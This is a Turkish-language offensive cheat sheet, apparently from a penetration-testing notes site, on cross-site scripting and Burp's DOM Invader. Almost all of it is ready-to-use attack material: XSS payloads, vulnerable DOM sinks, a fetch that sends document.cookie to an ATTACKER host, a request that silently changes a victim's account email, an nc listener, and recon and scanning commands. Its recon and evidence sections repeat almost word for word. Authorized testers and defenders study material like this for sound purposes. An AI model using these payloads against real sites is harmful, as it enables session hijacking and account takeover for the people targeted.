DOM Invader
web xss
DOM Invader bağlamında saldırgan kontrollü script’in güvenilen origin’de çalışması hedeflenir. Reflected/stored/DOM yolları ve oturum sömürüsü odaklıdır.
Metodoloji
Section titled “Metodoloji”-
Yansıma bağlamını (HTML/attr/JS/URL) işaretçi ile bul.
-
Bağlama uygun payload ve encode katmanını kır.
-
CSP/WAF varsa gadget veya bypass dene.
-
Oturum çalma veya işlem PoC’si üret.
Bağlam tespiti
Section titled “Bağlam tespiti”pt7x9MARKERcurl -sk 'https://TARGET/search?q=pt7x9MARKER' | rg -n 'pt7x9MARKER'<svg/onload=alert(document.domain)>"><img src=x onerror=alert(1)>';alert(document.domain)//dalfox url 'https://TARGET/search?q=FUZZ' -b https://ATTACKER/DOM XSS sink/source
Section titled “DOM XSS sink/source”location.hash.slice(1)document.write(location.search)el.innerHTML = new URLSearchParams(location.search).get('q')nuclei -u https://TARGET -t exposures/ -tags xssDOM Invader
Section titled “DOM Invader”Burp → DOM Invader → canary enjekte → sink listesisource: location / postMessage / web storageburpsuiteOturum sömürüsü
Section titled “Oturum sömürüsü”fetch('https://ATTACKER/c?'+document.cookie)fetch('/api/change-email',{method:'POST',credentials:'include',headers:{'Content-Type':'application/json'},body:JSON.stringify({email:'evil@x.com'})})nc -lvnp 8000Operasyon notları
Section titled “Operasyon notları”DOM Invader sonuçları hedef sürüme ve yığına göre değişir. Her başarılı adımı request/response ile kaydet; sonraki pivot’u not et.
Ek komutlar
Section titled “Ek komutlar”curl -sk https://TARGET/robots.txtnuclei -u https://TARGET -as -silentffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403GET / HTTP/1.1Host: TARGETAccept: */*mkdir -p evidence/web && tee evidence/web/notes.txtBu ekler keşif ve kanıt paketini hızlandırır; asıl sömürü üstteki bölümlerdeki konu-özel payload’larla yapılır.
Ek keşif komutları
Section titled “Ek keşif komutları”curl -sk https://TARGET/robots.txtcurl -sk https://TARGET/sitemap.xmlffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403nuclei -u https://TARGET -as -silentGET / HTTP/1.1Host: TARGETAccept: */*Kanıt toplama
Section titled “Kanıt toplama”mkdir -p evidence/web && tee evidence/web/notes.txtrequest/responsezaman damgasıkullanılan hesapetki özeticurl -sk https://TARGET/ -D evidence/web/headers.txt -o evidence/web/body.html